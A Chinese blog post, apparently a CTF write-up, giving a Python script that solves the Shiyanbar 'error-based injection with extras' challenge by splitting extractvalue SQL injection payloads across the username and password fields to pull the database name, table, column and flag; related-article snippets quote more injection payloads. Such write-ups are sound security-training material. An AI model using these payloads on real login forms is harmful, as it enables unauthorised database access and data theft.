实验吧——加了料的报错注入

最新推荐文章于 2022-01-17 21:18:24 发布
最新推荐文章于 2022-01-17 21:18:24 发布
阅读量214 收藏
点赞数
分类专栏: 实验吧 文章标签: SQL注入 CTF 实验吧
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xiaoyuer0123/article/details/100216662
版权

 

# -*- coding:utf8 -*-
import requests
import re

def denglu(username,password):
    # 设置代理,用于调试过程中抓包分析
    proxies = {
      "http": "http://localhost:9008",
      "https": "http://localhost:9008",
    }  
    # 组包
    header = { "User-Agent" : "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.100 Safari/537.36",
               "Referer": "http://www.shiyanbar.com/ctf/2011",
               "Content-Type": "application/x-www-form-urlencoded",
               "Upgrade-Insecure-Requests": "1",
               
               }
    url='http://ctf5.shiyanbar.com/web/baocuo/index.php'
    session = requests.session()
    payload = {
        'username':username,
        'password':password
        }
    
    r = session.post(url, data=payload,headers = header).text
    Set_Cookie = requests.utils.dict_from_cookiejar(session.cookies)
    # 过滤有效信息,作为函数返回值
    r = r.replace("<br>XPATH syntax error: ","")
    r = r.replace("'","")
    r = r.replace("\\","")
    if "," in r:
        tmp = re.split(",",r)
        return tmp[0]
    else:
        return r
    
# 查询数据库名
database = denglu("'or extractvalue /*", "*/(1, concat(0x5c,(SELECT database()))) or'") 
print(database)
# 查询表名称
#table = denglu("'or extractvalue /*", "*/(1, concat(0x5c,(SELECT GROUP_CONCAT(table_name) FROM information_schema.tables where TABLE_SCHEMA REGEXP 'error_based_hpf'))) or'") 
table = denglu("'or extractvalue /*", "*/(1, concat(0x5c,(SELECT GROUP_CONCAT(table_name) FROM information_schema.tables where TABLE_SCHEMA REGEXP '"+database+"'))) or'") 
print(table)
# 查询字段名
#column = denglu("'or extractvalue /*", "*/(1, concat(0x5c,(SELECT GROUP_CONCAT(column_name) from information_schema.KEY_COLUMN_USAGE where table_schema REGEXP database() and table_name REGEXP 'ffll44jj'))) or'")
column = denglu("'or extractvalue /*", "*/(1, concat(0x5c,(SELECT GROUP_CONCAT(column_name) from information_schema.KEY_COLUMN_USAGE where table_schema REGEXP database() and table_name REGEXP '"+table+"'))) or'")
print(column)
# 找到flag
#result = denglu("'or extractvalue /*", "*/(1, concat(0x5c,(SELECT value FROM ffll44jj))) or'") 
result = denglu("'or extractvalue /*", "*/(1, concat(0x5c,(SELECT "+column+" FROM "+table+"))) or'") 
print(result)

 

xiaoyuer0123
关注
专栏目录
秒懂,Java 注解 (Annotation)你可以这样学
frank 的专栏
06-27 27万+
文章开头先引入一处图片。 这处图片引自老罗的博客。为了避免不必要的麻烦,首先声明我个人比较尊敬老罗的。至于为什么放这张图,自然是为本篇博文服务,接下来我自会说明。好了,可以开始今天的博文了。 Annotation 中文译过来就是注解、标释的意思,在 Java 中注解是一个很重要的知识点,但经常还是有点让新手不容易理解。 我个人认为,比较糟糕的技术文档主要特征之一就是:用专业名词来...
DVWA实验
weixin_43511698的博客
11-27 1199
DVWA实验 一下都是基于low,mid,high级别的实验,为了方便叙述,提前在数据库中建了一个flag表 Brute Force 使用工具 :bp 使用材料:密码字典 bp的四种爆破攻击类型 第一种: Sniper标签 这个是我们最常用的,Sniper是狙击手的意思。这个模式会使用单一的payload【就是导入字典的payload】组。它会针对每个position中$$位置设置payload。这种攻击类型适合对常见漏洞中的请求参数单独地进行测试。攻击中的请求总数应该是position数量和payload
加了料报错注入-实验
Xi4or0uji
06-05 884
去fuzz一下waf可以看到username不能用括号,然鹅password不能用floor,updatexml,polygon,multipoint,extractvalue,geometrycollection,multinestring,mulpolygon,linestring这些报错函数所以...........怎么注入?!...
加了料报错注入SQL
雨九九的小窝
10-25 353
地址: http://ctf5.shiyanbar.com/web/baocuo/index.php 参考资料:https://www.jianshu.com/p/95f18a32ec7b https://blog.csdn.net/he_and/article/details/80572740 源码中的有用信息: 要用post提交username和password,所以用burp 爆出当前...
CTF-加了料报错注入 WP
05-16 444
加了料报错注入 分值:35 flag格式:flag{xxx} 解题链接:http://ctf5.shiyanbar.com/web/baocuo/index.php 1.寻找解题思路 首先打开页面,如图: 提示让你登陆,参数以post方式提交,右键查看源代码,发现sql语句: $sql="select * from users where username='$u...
实验加了料报错注入
JacobTsang的博客
10-29 257
注意GET请求和POST请求包头的区别 否则参数传递不到后台 GET请求: Content-Type: application/json POST请求: Content-Type:application/x-www-form-urlencoded 构造字典扫一下注入点过滤了哪些关键字: xpath injection 报错注入分析之updatexml注入 链接:http://www.mami...
实验吧 WEB 加了料报错注入
fr4granc3
01-28 1457
没有用户名和密码的输入框,因此不能直接在URL中传递username和password参数。要使用hackbar或者burpsuit传。(还不太理解为什么) 首先尝试username=1&amp;amp;password=1,提示Login failed。 尝试username='or'1&amp;amp;password='or'1,提示You are our member, welcome to ...
实验吧——WEB-简单的登录题、后台登录、加了料报错注入、你真的会PHP吗?
迷风小白
03-29 2831
一. 简单的登录题 这道题确实一点都不简单 二、后台登录 这道题打开就是一个登录框,输入一个1,提示密码错误,查看源代码。 <!-- $password=$_POST['password']; $sql = "SELECT * FROM admin WHERE username = 'admin' and password = '".md5($password,true)."'"; $r...
【项目经验】Spring Boot 搭建记录+错误经验(已完结)
IN THE ZONE
11-27 752
错误记录:
aircrack-ng 介绍、功能测试及部分源码分析
m0_51937621的博客
01-17 1万+
aircrack-ng 介绍、功能测试及部分源码分析 【实验目的】 1、理清aircrack-ng的总体设计框架,包括各模块的功能与联系; 2、核心模块的实现原理(aircrack-ng、aireplay-ng、airodump-ng) 【实验要求】 1、 查找aircrack-ng软件相关资料,搞清楚是什么的问题。 2、 分析aircrack-ng的功能以及对应的实现模块和各模块的依赖关系 3、 主要攻击方式和流程介绍 4、 对WPA/WPA2加密方式和破解进行深入探究 5、 阅读aircrack-ng,
暑期练习web8:加了料报错注入实验吧)
qq_41618162的博客
08-17 1000
解题连接:ht=tp://ctf5.shiyanbar.com/web/baocuo/index.php 进入解题首页面就出现tips让我们post给username和password传值 随便传个值试试 只报了登陆失败的字样 换成username=’&amp;password=5就说我有sql语法错误,说明这题是要考虑sql注入的 然后用burpsuite检测许多sql相关的词,看...
加了料报错注入 - exp报错解法
苟有恒,必有三更眠,五更起。
07-03 318
加了料报错注入 - exp报错解法 原题链接 http://ctf5.shiyanbar.com/web/baocuo/index.php 分析 exp测试一下(因为#之类的注释符被过滤,注意闭合): username=&amp;password='or exp() or ' 查数据库: username=&amp;password=' or exp...
实验吧WP(web部分)【简单的登录题,后台登录,加了料报错注入,认真一点,你真的会PHP吗?】
taozijun的博客
05-22 7446
一. 简单的登录题这道题一点也不简单,用到cbc字节翻转攻击等技术,先跳过这题,想了解可看实验吧上pcat大神的writeup。二. 后台登录这道题
实验吧-加了料报错注入
一个安全研究员
06-04 3671
前言 不得不说这一题对我来说挺有难度的,以前没有遇到过。看了别人的writeup过后,也想要记录一下,给自己攒攒经验 这题的解法有两种: (1)HPF(http parameter fragment) (2)exp()报错注入 HPF注入 查看源码: 就是要提交post数据,我直接在burpsuite里面操作。 随便输入两个参数,页面提示login failed。根据源码中的s...
实验加了料报错注入 再见报错注入
Assassin
01-31 1999
本题怎么说,细思之下并不是很难,为什么记录一下,一个是之前对报错注入的利用方式实在是太过于简单,简直不知道怎么用,一个是确实手生了很多吧。 言归正传,这个题目还是一般有意思的(不是我自己做的,但是想记录一下) 现在还是体会到了动手之前要把准备工作准备好了 首先看一下界面,随手输入一直显示注入失败,而且我们看到了网页中的提示sql语句是<!-- $sql="select * from users
报错注入的一些整理 By Assassin
Assassin
01-29 1250
mysql暴错注入方法整理,通过floor,UpdateXml,ExtractValue,NAME_CONST,Error based Double Query Injection等方法SQL注入1、通过floor暴错 /数据库版本/ http://www.waitalone.cn/sql.php?id=1+and(select 1 from(select count(*),concat((se
注入的花式绕过姿势--向鸡哥学习
Assassin
07-16 3471
打了一次比赛,大佬们都说简单,我却什么都做不出来,真心受伤的一逼,是时候学习一波大佬的经验了,本次主要想要抄袭一下鸡哥的what a fuck总结,嗯嗯. 1.WAF绕过姿势 (1)大小写绕过 SQL语句中对大小写没有限制,但是PHP中函数经常对大小写敏感,所以用到的地方较少。 (2)双关键字 有一种waf保护的方法是删除select 、 union等关键字,所以有时用两遍可
SQL注入之报错型注入
running
02-24 2418
前提一般是在页面没有显示位、但用echo mysql_error();输出了错误信息的时候使用, 它的特点是注入速度快,但是语句较复杂,不能用group_concat(),只能用limit依次猜解 利用方式count(*)、rand()、group by三者缺一不可报错注入用一个公式,只要套用公式即可,公式如下:?id=2' and (select 1 from (select &lt;u&gt;...
SQL注入报错注入
热门推荐
4ct10n
10-07 1万+
做了一些报错注入的题目,总结了一下。原理很简单,只要理解了就能熟练的应用。大体上分了两类出来,一个是利用xml报错,另一个是正常数据库报错。两类的原理不同。
sql注入教程:报错注入与二阶攻击策略
本篇自学笔记详细探讨了SQL注入中的一个重要技术手段——报错注入报错注入利用的是Web应用程序中未关闭或过滤错误处理功能的情况,攻击者通过构造恶意SQL语句,迫使服务器在执行时返回错误信息,从而间接获取敏感...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

xiaoyuer0123

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值